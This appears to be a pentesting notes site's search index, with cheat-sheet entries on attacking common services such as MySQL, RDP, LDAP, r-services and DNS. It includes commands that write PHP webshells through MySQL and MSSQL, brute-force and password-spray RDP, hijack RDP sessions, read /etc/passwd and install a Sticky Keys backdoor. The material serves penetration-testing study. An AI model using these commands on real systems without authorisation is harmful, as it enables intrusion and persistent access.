                        Squid is commonly deployed in network environments to improve performance, enhance security, and manage internet access. Squid can cache frequently requested web content locally. When a client requests a web page or object that Squid has cached, it serves the content from its cache instead of fetching it from the original web server.

                        Access Control: Squid provides robust access control mechanisms. Administrators can configure rules to control which clients are allowed to access specific websites or web services.

                        Content Filtering: Squid can be used for content filtering and blocking access to specific websites or categories of websites (e.g., social media, adult content). This feature is often used by organizations to enforce acceptable use policies.

                        ","tags":["pentesting","web pentesting","port 3128","proxy"]},{"location":"3128-squid/#enumeration","title":"Enumeration","text":"
# Proxify curl\ncurl -x http://$ip:3128 http://$ip -H \"User-Agent:Firefox\"\n# -x / --proxy: use the given proxy\n
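If the Squid proxy is open, it can also be used as a pivot by adding it to the proxychains configuration and tunneling tools through it; a sketch (config path may vary by distribution, and nmap must use TCP connect scans through the proxy):

echo \"http $ip 3128\" | sudo tee -a /etc/proxychains.conf\nproxychains curl http://127.0.0.1\nproxychains nmap -sT -Pn -p80,443 <internal_ip>\n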
                        ","tags":["pentesting","web pentesting","port 3128","proxy"]},{"location":"3306-mariadb-mysql/","title":"3306 mariaDB - mySQL","text":"","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#description","title":"Description","text":"

MySQL: MySQL is an open-source relational database management system (RDBMS) based on Structured Query Language (SQL). It is developed and managed by Oracle Corporation and was initially released on 23 May 1995. It is widely used in many small and large scale industrial applications and is capable of handling a large volume of data. After the acquisition of MySQL by Oracle, some issues arose with the usage of the database, and hence MariaDB was developed.

MariaDB: MariaDB is an open-source relational database management system (RDBMS) that is a compatible drop-in replacement for the widely used MySQL database technology. It is developed by the MariaDB Foundation and was initially released on 29 October 2009. MariaDB adds a significant number of new features, which makes it better than MySQL in terms of performance and user-orientation.

                        sudo nmap $ip -sV -sC -p3306 --script mysql*\n
                        sudo nmap -sS -sV --script mysql-empty-password -p 3306 $ip\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#connect-to-database-mariadb","title":"Connect to database: mariadb","text":"
# -h: host/IP   \n# -u: user. By default mariadb has a root user with no authentication\nmariadb -h <host/IP> -u root\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#connect-to-database-mysql","title":"Connect to database: mysql","text":"","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#from-linux","title":"From Linux","text":"
# -h: host/IP   \n# -u: user. By default mysql has a root user with no authentication\nmysql --host=INSTANCE_IP --user=root --password=thepassword\nmysql -h <host/IP> -u root -p<password>\n\nmysql -u root -h <host/IP>\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#from-windows","title":"From windows","text":"
                        mysql.exe -u username -pPassword123 -h $IP\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#mariadb-commands","title":"mariadb commands","text":"
# Get all databases\nshow databases;\n\n# Select a database\nuse <databaseName>;\n\n# Get all tables from the previously selected database\nshow tables; \n\n# Dump columns from a table\ndescribe <table_name>;\n\n# Dump columns from a table\nshow columns from <table>;\n\n# Select columns from a table\nselect username,password from users;\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#upload-a-shell","title":"Upload a shell","text":"

                        Take a wordpress installation that uses a mysql database. If you manage to login into the mysql panel (/phpmyadmin) as root then you could upload a php shell to the /wp-content/uploads/ folder.

                        Select \"<?php echo shell_exec($_GET['cmd']);?>\" into outfile \"/var/www/https/blogblog/wp-content/uploads/shell.php\";\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#mysql-basic-commands","title":"mysql basic commands","text":"

                        See mysql.

# Show databases\nSHOW databases;\n\n# Show tables\nSHOW tables;\n\n# Create new database\nCREATE DATABASE nameofdatabase;\n\n# Delete database\nDROP DATABASE nameofdatabase;\n\n# Select a database\nUSE nameofdatabase;\n\n# Dump content from nameOftable\nSELECT * FROM nameOftable;\n\n# Create a table with some columns in the previously selected database\nCREATE TABLE persona(nombre VARCHAR(255), edad INT, id INT);\n\n# Modify, add, or remove a column of a table\nALTER TABLE persona MODIFY edad VARCHAR(200);\nALTER TABLE persona ADD description VARCHAR(200);\nALTER TABLE persona DROP COLUMN edad;\n\n# Insert a new row with values in a table\nINSERT INTO persona VALUES(\"alvaro\", 54, 1);\n\n# Show all rows from table\nSELECT * FROM persona;\n\n# Select a row from a table filtering by the value of a given column\nSELECT * FROM persona WHERE nombre=\"alvaro\";\n\n# JOIN query\nSELECT * FROM oficina JOIN persona ON persona.id=oficina.user_id;\n\n# UNION query. This means, for an attack, that the number of columns has to be the same\nSELECT * FROM oficina UNION SELECT * from persona;\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#enumeration-queries","title":"Enumeration queries","text":"
# Show current user\nSELECT current_user();\nSELECT user();\n\n# Show current database\nSELECT database();\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#command-execution","title":"Command execution","text":"","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#writing-files","title":"Writing files","text":"

MySQL supports User Defined Functions, which allow us to execute C/C++ code as a function within SQL; there's one User Defined Function for command execution in this GitHub repository.

MySQL does not have a stored procedure like xp_cmdshell, but we can achieve command execution if we write to a location in the file system that can execute our commands.

• If MySQL operates on a PHP-based web server, or one using other programming languages like ASP.NET, and we have the appropriate privileges, we can attempt to write a file using SELECT INTO OUTFILE in the webserver directory.
                        • Browse to the location where the file is and execute the commands.
                         SELECT \"<?php echo shell_exec($_GET['c']);?>\" INTO OUTFILE '/var/www/html/webshell.php';\n
• In MySQL, a global system variable secure_file_priv limits the effect of data import and export operations, such as those performed by the LOAD DATA and SELECT … INTO OUTFILE statements and the LOAD_FILE() function. These operations are permitted only to users who have the FILE privilege.
• Settings in secure_file_priv:
  • If empty, the variable has no effect, which is not a secure setting, as we can read and write data using MySQL:

    show variables like \"secure_file_priv\";\n
+------------------+-------+\n| Variable_name    | Value |\n+------------------+-------+\n| secure_file_priv |       |\n+------------------+-------+\n
  • If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it.
  • If set to NULL, the server disables import and export operations.

# To write files using MSSQL, we need to enable Ole Automation Procedures, which requires admin privileges, and then execute some stored procedures to create the file:\n\nsp_configure 'show advanced options', 1;\nRECONFIGURE;\nsp_configure 'Ole Automation Procedures', 1;\nRECONFIGURE;\n\n# Using MSSQL to Create a File\nDECLARE @OLE INT;\nDECLARE @FileID INT;\nEXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT;\nEXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\\inetpub\\wwwroot\\webshell.php', 8, 1;\nEXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET[\"c\"]);?>';\nEXECUTE sp_OADestroy @FileID;\nEXECUTE sp_OADestroy @OLE;\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#reading-files","title":"Reading files","text":"","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#mysql-read-local-files-in-mysql","title":"MySQL - Read Local Files in MySQL","text":"

If permissions allow it:

                        select LOAD_FILE(\"/etc/passwd\");\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3389-rdp/","title":"3389 rdp","text":"","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#description","title":"Description","text":"

                        source: https://book.hacktricks.xyz/network-services-pentesting/pentesting-rdp and HackTheBox Academy.

Basic information about the RDP service: Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software.

| Name | Description |
|---|---|
| port | 3389/TCP |
| state | open |
| service | ms-wbt-server |
| version | Microsoft Terminal Services |
| Banner | rdp-ntlm-info |

RDP works at the application layer in the TCP/IP reference model, typically utilizing TCP port 3389 as the transport protocol. However, the connectionless UDP protocol can also use port 3389 for remote administration. The Remote Desktop service is installed by default on Windows servers and does not require additional external applications. This service can be activated using the Server Manager and comes with the default setting to allow connections to the service only from hosts with Network Level Authentication (NLA).

                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#enumeration","title":"Enumeration","text":"

The following scan checks the available encryption methods and DoS vulnerabilities (without causing a DoS to the service) and obtains NTLM Windows info (versions).

nmap uses RDP cookies (mstshash=nmap) to interact with the RDP server. These cookies can be identified by security services such as EDRs and can lock us out, so we need to think twice before running that scan.

                        nmap -Pn -sV -p3389 --script rdp-*  $ip\n

                        Results:

                        PORT     STATE SERVICE       VERSION\n3389/tcp open  ms-wbt-server Microsoft Terminal Services\n| rdp-enum-encryption:\n|   Security layer\n|     CredSSP (NLA): SUCCESS\n|     CredSSP with Early User Auth: SUCCESS\n|_    RDSTLS: SUCCESS\n| rdp-ntlm-info:\n|   Target_Name: EXPLOSION\n|   NetBIOS_Domain_Name: EXPLOSION\n|   NetBIOS_Computer_Name: EXPLOSION\n|   DNS_Domain_Name: Explosion\n|   DNS_Computer_Name: Explosion\n|   Product_Version: 10.0.17763\n|_  System_Time: 2022-11-11T12:16:26+00:00\nService Info: OS: Windows; CPE: cpe:/o:microsoft:windows\n

                        rdp-sec-check.pl is a perl script to enumerate security settings of an RDP Service (AKA Terminal Services).

                        git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check\n\n./rdp-sec-check.pl $ip\n
                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#connection-with-rdp","title":"Connection with rdp","text":"

                        To run Microsoft\u2019s Remote Desktop Protocol (RDP) client, a command-line interface called Microsoft Terminal Services Client (MSTSC) is used. We can connect to RDP servers on Linux using xfreerdp, rdesktop, or Remmina and interact with the GUI of the server accordingly.

                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#xfreerdp","title":"xfreerdp","text":"

                        See xfreerdp.

We can first try to form an RDP session with the target by not providing any additional information for any switches other than the target IP address. This makes the client use your own username as the login username for the RDP session, thus testing guest login capabilities.

                        xfreerdp /v:$ip\n# /v:$ip: Specifies the target IP of the host we would like to connect to.\n

Try to log in with other default accounts, such as user, admin, Administrator, and so on. We will also specify that all security certificate requirements should be ignored so that the client does not prompt for them:

xfreerdp /cert:ignore /u:Administrator /v:$ip\n# /cert:ignore : Specifies that all security certificate usage should be ignored.\n# /u:Administrator : Specifies the login username to be \"Administrator\".\n# /v:$ip: Specifies the target IP of the host we would like to connect to.\n

If successful, during the initialization of the RDP session, we will be asked for a password. We can hit Enter to see if the process continues without one. Sometimes there are severe mishaps in configurations like this, and we can gain access.

                        If you know user and credentials:

                        xfreerdp /u:<username> /p:<\"password\"> /v:$ip \n
                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#brute-force","title":"Brute force","text":"

                        ncrack -vv --user <User> -P pwds.txt rdp://$ip\n\nhydra -V -f -L <userslist> -P <passwlist> rdp://$ip\n\nhydra -L user.list -P password.list rdp://$ip\n
Be careful: you could lock out accounts

                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#password-spraying","title":"Password Spraying","text":"

Be careful: you could lock out accounts

                        # https://github.com/galkan/crowbar\ncrowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'\n\n# hydra\nhydra -L usernames.txt -p 'password123' 192.168.2.143 rdp\n
                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#connect-with-known-credentialshash","title":"Connect with known credentials/hash","text":"
                        rdesktop -u <username> $ip\nrdesktop -d <domain> -u <username> -p <password> $ip\nxfreerdp [/d:domain] /u:<username> /p:<password> /v:$ip\nxfreerdp [/d:domain] /u:<username> /pth:<hash> /v:$ip #Pass the hash\n

                        Check known credentials against RDP services

rdp_check.py from Impacket lets you check if some credentials are valid for an RDP service:

                        rdp_check <domain>/<name>:<password>@$ip\n
                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#attacks","title":"Attacks","text":"","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#session-stealing","title":"Session stealing","text":"

With SYSTEM permissions, you can access any RDP session opened by any user without needing to know the owner's password.

Get opened sessions:

                        query user\n

Access the selected session:

                        tscon <ID> /dest:<SESSIONNAME>\n

Now you will be inside the selected RDP session, having impersonated the user using only Windows tools and features.

Important: when you access an active RDP session, you will kick off the user that was using it. You could also get passwords by dumping the process, but this method is much faster and lets you interact with the user's virtual desktops (passwords in Notepad that have not been saved to disk, other RDP sessions opened on other machines...).

                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#mimikatz","title":"Mimikatz","text":"

                        You could also use mimikatz to do this:

                        ts::sessions #Get sessions\nts::remote /id:2 #Connect to the session\n

Sticky Keys & Utilman: combining this technique with the Sticky Keys or Utilman backdoors, you will be able to access an administrative CMD and any RDP session at any time.
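A classic sketch of the Sticky Keys backdoor sets cmd.exe as the Image File Execution Options debugger for sethc.exe, so pressing Shift five times at the lock or login screen spawns a SYSTEM shell (requires administrative privileges on the host):

REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\"\n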

                        You can search RDPs that have been backdoored with one of these techniques already with: https://github.com/linuz/Sticky-Keys-Slayer

                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#rdp-process-injection","title":"RDP Process Injection","text":"

If someone from a different domain or with better privileges logs in via RDP to the PC where you are an admin, you can inject your beacon into their RDP session process and act as them:

                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#rdp-sessions-abuse","title":"RDP Sessions Abuse","text":"
                        # Adding User to RDP group\nnet localgroup \"Remote Desktop Users\" UserLoginName /add\n
                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#shadow-attack","title":"Shadow Attack","text":"

AutoRDPwn is a post-exploitation framework created in PowerShell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view the victim's desktop without their consent, and even control it on demand, using tools native to the operating system itself.

                        https://github.com/JoelGMSec/AutoRDPwn

                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"389-636-ldap/","title":"389 - 636 LDAP","text":"

LDAP is an application protocol used for accessing, modifying and querying distributed directory information services (such as Active Directory) over a TCP/Internet Protocol (IP) network. A directory service is a database-like virtual storage that holds data in a specific hierarchical structure. The LDAP structure is based on a tree of directory entries.

The Lightweight Directory Access Protocol (LDAP) is an integral part of Active Directory (AD): an open, vendor-neutral, industry-standard application protocol for accessing and maintaining distributed directory information services over a TCP/IP network.

LDAP runs on port 389 (unencrypted connections) and 636 (LDAP over SSL).

                        The relationship between AD and LDAP can be compared to Apache and HTTP. The same way Apache is a web server that uses the HTTP protocol, Active Directory is a directory server that uses the LDAP protocol. While uncommon, you may come across organizations while performing an assessment that does not have AD but does have LDAP, meaning that they most likely use another type of LDAP server such as OpenLDAP.

                        • TCP and UDP port 389 and 636.
• It's a binary protocol and by default not encrypted.
• It has been updated to include encryption add-ons, such as Transport Layer Security (TLS)/SSL, and can be tunnelled through SSH.

                        The hierarchy (tree) of information stored via LDAP is known as the Directory Information Tree (DIT). That structure is defined in a schema.

                        A common use of LDAP is to provide a central place to store usernames and passwords. This allows many different applications and services to connect to the LDAP server to validate users.

                        The latest LDAP specification is Version 3, which is published as RFC 4511. AD stores user account information and security information such as passwords and facilitates sharing this information with other devices on the network. LDAP is the language that applications use to communicate with other servers that also provide directory services. In other words, LDAP is a way that systems in the network environment can \"speak\" to AD.

                        ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#ad-ldap-authentication","title":"AD LDAP Authentication","text":"

                        LDAP is set up to authenticate credentials against AD using a \"BIND\" operation to set the authentication state for an LDAP session. There are two types of LDAP authentication.

                        1. Simple Authentication: This includes anonymous authentication, unauthenticated authentication, and username/password authentication. Simple authentication means that a username and password create a BIND request to authenticate to the LDAP server.

                        2. SASL Authentication: The Simple Authentication and Security Layer (SASL) framework uses other authentication services, such as Kerberos, to bind to the LDAP server and then uses this authentication service (Kerberos in this example) to authenticate to LDAP. The LDAP server uses the LDAP protocol to send an LDAP message to the authorization service which initiates a series of challenge/response messages resulting in either successful or unsuccessful authentication. SASL can provide further security due to the separation of authentication methods from application protocols.

                        LDAP authentication messages are sent in cleartext by default so anyone can sniff out LDAP messages on the internal network. It is recommended to use TLS encryption or similar to safeguard this information in transit.

                        ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#ldif-file","title":"LDIF file","text":"

                        Example of a LDIF file:

                        dn: dc=example,dc=com\nobjectclass: top\nobjectclass: domain\ndc: example\n\ndn: ou=People, dc=example,dc=com\nobjectclass: top\nobjectclass: organizationalunit\nou: People\naci: (targetattr=\"*||+\")(version 3.0; acl \"IDM Access\"; allow (all)\n  userdn=\"ldap:///uid=idm,ou=Administrators,dc=example,dc=com\";)\n\ndn: uid=jgibbs, ou=People, dc=example,dc=com\nuid: jgibbs\ncn: Joshamee Gibbs\nsn: Gibbs\ngivenname: Joshamee\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\nl: Caribbean\nmail: jgibbs@blackpearl.com\ntelephonenumber: +1 408 555 1234\nfacsimiletelephonenumber: +1 408 555 4321\nuserpassword: supersecret\n\ndn: uid=hbarbossa, ou=People, dc=example,dc=com\nuid: hbarbossa\ncn: Hector Barbossa\nsn: Barbossa\ngivenname: Hector\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\nl: Caribbean\no: Brethren Court\nmail: captain.barbossa@example.com\ntelephonenumber: +421 910 382734\nfacsimiletelephonenumber: +1 408 555 1111\nroomnumber: 111\nuserpassword: deadjack\n\n# Note:\n# Lord Bectett is an exception to the cn = givenName + sn rule\n\ndn: uid=jbeckett, ou=People, dc=example,dc=com\nuid: jbeckett\ncn: Lord Cutler Beckett\nsn: Beckett\ngivenname: Cutler\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\nl: Caribbean\no: East India Trading Co.\nmail: bigboss@eitc.com\ntelephonenumber: +421 910 382333\nfacsimiletelephonenumber: +1 408 555 2222\nroomnumber: 666\nuserpassword: takeovertheworld\n\ndn: ou=Groups, dc=example,dc=com\nobjectclass: top\nobjectclass: organizationalunit\nou: Groups\naci: (targetattr=\"*||+\")(version 3.0; acl \"IDM Access\"; allow (all)\n  userdn=\"ldap:///uid=idm,ou=Administrators,dc=example,dc=com\";)\n\ndn: cn=Pirates,ou=groups,dc=example,dc=com\nobjectclass: top\nobjectclass: groupOfUniqueNames\ncn: Pirates\nou: groups\nuniquemember: uid=jgibbs, ou=People, dc=example,dc=com\nuniquemember: uid=barbossa, ou=People, dc=example,dc=com\ndescription: Arrrrr!\n\ndn: ou=Administrators, dc=example,dc=com\nobjectclass: top\nobjectclass: organizationalunit\nou: Administrators\n\ndn: uid=idm, ou=Administrators,dc=example,dc=com\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\nuid: idm\ncn: IDM Administrator\nsn: IDM Administrator\ndescription: Special LDAP acccount used by the IDM\n  to access the LDAP data.\nou: Administrators\nuserPassword: secret\nds-privilege-name: unindexed-search\n

LDAP operators:

| Operator | Description |
|---|---|
| = | Equal to |
| \| | Logical OR |
| ! | Logical NOT |
| & | Logical AND |
| * | Wildcard, any string or character |

Example: any surname starting with \"a\" or canonical name starting with \"b\":

                        (|(sn=a*)(cn=b*))\n
                        ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#ldap-queries-ldapfilter","title":"LDAP queries: LDAPFilter","text":"

By combining the \"Get-ADObject\" cmdlet with the \"LDAPFilter\" parameter, we can perform LDAP queries via PowerShell.

                        Get-ADObject -LDAPFilter <FILTER> | select cn\n

                        Some useful LDAPFilters:

| Search for | LDAP query |
|---|---|
| Find All Workstations | '(objectCategory=computer)' |
| Find All Domain Controllers | '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))' |
| Find All Users | '(&(objectCategory=person)(objectClass=user))' |
| Find All Contacts | '(objectClass=contact)' |
| Find All Users and Contacts | '(objectClass=user)' |
| List Disabled Users | '(userAccountControl:1.2.840.113556.1.4.803:=2)' |
| Find All Groups | '(objectClass=group)' |
| Find direct members of a Security Group | '(memberOf=CN=Admin,OU=Security,DC=DOM,DC=NT)' |
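For instance, listing all disabled users with the filter from the table above (requires the ActiveDirectory PowerShell module):

Get-ADObject -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=2)' | select cn\n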

                        More:

                        • LDAP Queries related to AD computers
                        • LDAP queries related to AD users.
                        • LDAP queries related to AD groups.
                        ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#ldap-queries-search-filters","title":"LDAP queries: Search Filters","text":"

                        The LDAPFilter parameter with the same cmdlets lets us use LDAP search filters when searching for information.

                        Operators:

                        • & -> and
                        • | -> or
                        • ! -> not

                        AND Operation:

• Two criteria: (& (..C1..) (..C2..))
• More than two criteria: (& (..C1..) (..C2..) (..C3..))

                        OR Operation:

• Two criteria: (| (..C1..) (..C2..))
• More than two criteria: (| (..C1..) (..C2..) (..C3..))
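As an example combining these operators, the following filter matches all user objects that are not disabled:

(&(objectCategory=person)(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))\n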
                        ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#filters","title":"Filters","text":"Criteria Rule Example Equal to (attribute=123) (&(objectclass=user)(displayName=Smith) Not equal to (!(attribute=123)) !objectClass=group) Present (attribute=*) (department=*) Not present (!(attribute=*)) (!homeDirectory=*) Greater than (attribute>=123) (maxStorage=100000) Less than (attribute<=123) (maxStorage<=100000) Approximate match (attribute~=123) (sAMAccountName~=Jason) Wildcards (attribute=*A) (givenName=*Sam)","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#exploiting-vulndap","title":"Exploiting vuLnDAP","text":"

                        https://github.com/digininja/vuLnDAP

The full schemas for querying are documented at https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html

                        Examples:

                        ","tags":["active","directory","ldap","windows","port","389"]},{"location":"43-whois/","title":"Port 43 - whois","text":"

                        It is a TCP-based transaction-oriented query/response protocol listening on TCP port 43 by default. We can use it for querying databases containing domain names, IP addresses, or autonomous systems and provide information services to Internet users.

The Internet Corporation for Assigned Names and Numbers (ICANN) requires that accredited registrars enter the holder's contact information, the domain's creation and expiration dates, and other information in the Whois database immediately after registering a domain. In simple terms, the Whois database is a searchable list of all domains currently registered worldwide.

                        Sysinternals WHOIS for Windows or Linux WHOIS command-line utility are our preferred tools for gathering information. However, there are some online versions like whois.domaintools.com we can also use.

                        # linux\nwhois $TARGET\n\n# windows\nwhois.exe $TARGET\n
                        ","tags":["port 111","rpc","NFS","Network File System"]},{"location":"512-513-514-r-services/","title":"512 r services","text":"

                        R-services span across the ports 512, 513, and 514 and are only accessible through a suite of programs known as r-commands. R-Services are a suite of services hosted to enable remote access or issue commands between Unix hosts over TCP/IP.

                        r-services were the de facto standard for remote access between Unix operating systems until they were replaced by the Secure Shell (SSH) protocols and commands due to inherent security flaws built into them. They are most commonly used by commercial operating systems such as Solaris, HP-UX, and AIX. While less common nowadays, we do run into them from time to time.

                        The R-commands suite consists of the following programs:

                        • rcp (remote copy)
                        • rexec (remote execution)
                        • rlogin (remote login)
                        • rsh (remote shell)
                        • rstat
                        • ruptime
                        • rwho (remote who).

                        These are the most frequently abused commands:

| Command | Service Daemon | Port | Transport Protocol | Description |
|---|---|---|---|---|
| rcp | rshd | 514 | TCP | Copy a file or directory bidirectionally from the local system to the remote system (or vice versa) or from one remote system to another. It works like the cp command on Linux but provides no warning to the user for overwriting existing files on a system. |
| rsh | rshd | 514 | TCP | Opens a shell on a remote machine without a login procedure. Relies upon the trusted entries in the /etc/hosts.equiv and .rhosts files for validation. |
| rexec | rexecd | 512 | TCP | Enables a user to run shell commands on a remote machine. Requires authentication through the use of a username and password through an unencrypted network socket. Authentication is overridden by the trusted entries in the /etc/hosts.equiv and .rhosts files. |
| rlogin | rlogind | 513 | TCP | Enables a user to log in to a remote host over the network. It works similarly to telnet but can only connect to Unix-like hosts. Authentication is overridden by the trusted entries in the /etc/hosts.equiv and .rhosts files. |

                        The /etc/hosts.equiv file contains a list of trusted hosts and is used to grant access to other systems on the network.

                        "},{"location":"512-513-514-r-services/#footprinting-r-services","title":"Footprinting r-services","text":"
                        sudo nmap -sV -p 512,513,514 $ip\n

Even though these services utilize Pluggable Authentication Modules (PAM) for user authentication onto a remote system by default, they can also bypass this authentication through the use of the /etc/hosts.equiv and .rhosts files on the system.

                        If any misconfiguration exists on those files, we could get access to those services.

                        # Example of a misconfiguration in rhosts file:\n\nhtb-student     10.0.17.5\n+               10.0.17.10\n+               +\n\n# The file follows the specific syntax of `<username> <ip address>` or `<username> <hostname>` pairs. Additionally, the `+` modifier can be used within these files as a wildcard to specify anything. In this example, the `+` modifier allows any external user to access r-commands from the `htb-student` user account via the host with the IP address `10.0.17.10`.\n
                        "},{"location":"512-513-514-r-services/#accessing-the-service","title":"Accessing the service","text":"
                        # Login \nrlogin $ip -l <username>\n\n# list all interactive sessions on the local network by sending requests to the UDP port 513\nrwho\n\n#  detailed account of all logged-in users over the network, including information such as the username, hostname of the accessed machine, TTY that the user is logged in to, the date and time the user logged in, the amount of time since the user typed on the keyboard, and the remote host they logged in from (if applicable).\nrusers -al $ip\n
                        "},{"location":"53-dns/","title":"Port 53 - Domain Name Server (DNS)","text":"

                        Globally distributed DNS servers translate domain names into IP addresses and thus control which server a user can reach via a particular domain. There are several types of DNS servers that are used worldwide:

| Server Type | Description |
|---|---|
| DNS Root Server | Root servers of DNS are responsible for the top-level domains (TLD). As the last instance, they are only requested if the name server does not respond. ICANN coordinates the work of the root name servers. There are 13 such root servers around the globe. |
| Authoritative Nameserver | Authoritative name servers hold authority for a particular zone. They only answer queries from their area of responsibility, and their information is binding. If an authoritative name server cannot answer a client's query, the root name server takes over at that point. |
| Non-authoritative Nameserver | Non-authoritative name servers are not responsible for a particular DNS zone. Instead, they collect information on specific DNS zones themselves, which is done using recursive or iterative DNS querying. |
| Caching DNS Server | Caching DNS servers cache information from other name servers for a specified period. The authoritative name server determines the duration of this storage. |
| Forwarding Server | Forwarding servers perform only one function: they forward DNS queries to another DNS server. |
| Resolver | Resolvers are not authoritative DNS servers but perform name resolution locally in the computer or router. |
","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#resource-records","title":"Resource records","text":"

                        A resource record is a four-tuple that contains the following fields:

                        (Name, Value, Type, TTL)\n
                        • A records: If Type=A, then Name is a hostname and Value is the IP address for that name. We recognize the IP addresses that point to a specific (sub)domain through the A record. Example:
                        (relay1.bar.example.com, 145.222.36.125, A)\n
                        • MX records: If Type=MX, then Value is the canonical name of a mail server that has an alias hostname Name. The mail server records show us which mail server is responsible for managing the emails for the company. Example:

                          (example.com,mail.bar.example.com,MX)\n

                        • NS records: If Type=NS, then Name is a domain (such as example.com) and Value is the name of an authoritative DNS server that knows how to obtain the IP address for hosts in the domain. These kinds of records show which name servers are used to resolve the FQDN to IP addresses. Most hosting providers use their own name servers, making it easier to identify the hosting provider. Example:

                          (example.com,dns.example.com,NS)\n

                        • CNAME records: If Type=CNAME, then Value is a canonical hostname for the alias hostname Name. Example:

                          (example.com,relay1.bar.example.com,CNAME)\n

                        • TXT records: this type of record often contains verification keys for third-party providers and other DNS security settings, such as SPF, DMARC, and DKIM, which verify and confirm the origin of sent emails. These records can therefore reveal valuable information about the target's mail and service providers.

                        • AAAA records: Returns an IPv6 address of the requested domain.
                        • PTR record: The PTR (Pointer) record works the other way around (reverse lookup): it converts IP addresses into valid domain names. For an IP address to be resolved to a Fully Qualified Domain Name (FQDN), the DNS server must have a reverse lookup zone file, in which the FQDN is assigned, via a PTR record, to the last octet of the IP address corresponding to the host.
                        • SOA records: Start Of Authority (SOA). It should be first in a zone file because it indicates the start of a zone. Each zone can have only one SOA record, which holds the zone's values, such as a serial number and multiple expiration timeouts, along with the email address of the administrative contact. The SOA record specifies who is responsible for the operation of the domain and how DNS information for the domain is managed.

                        Summarizing:

                        ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#security","title":"Security","text":"

                        DNS is mostly unencrypted, so devices on the local WLAN and Internet providers can eavesdrop on DNS queries. Since this poses a privacy risk, several solutions for DNS encryption now exist. The usual approaches are DNS over TLS (DoT) and DNS over HTTPS (DoH). In addition, the DNSCrypt protocol encrypts the traffic between the computer and the name server.

                        ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#ips-to-add-to-etcresolvconf","title":"IPs to add to etc/resolv.conf","text":"

                        1.1.1.1 is a public DNS resolver operated by Cloudflare that offers a fast and private way to browse the Internet. Unlike many DNS resolvers, 1.1.1.1 does not sell user data to advertisers, and it consistently ranks among the fastest public DNS resolvers in independent measurements.
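
                        If you want your own machine to use it, add it to /etc/resolv.conf; resolvers are tried in the order listed, and note that DHCP clients or systemd-resolved may overwrite this file:

                        echo \"nameserver 1.1.1.1\" | sudo tee -a /etc/resolv.conf\n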

                        See DNS enumeration

                        ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#dns-transfer-zones","title":"DNS transfer zones","text":"

                        See dig axfr.

                        ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#dns-server","title":"DNS server","text":"

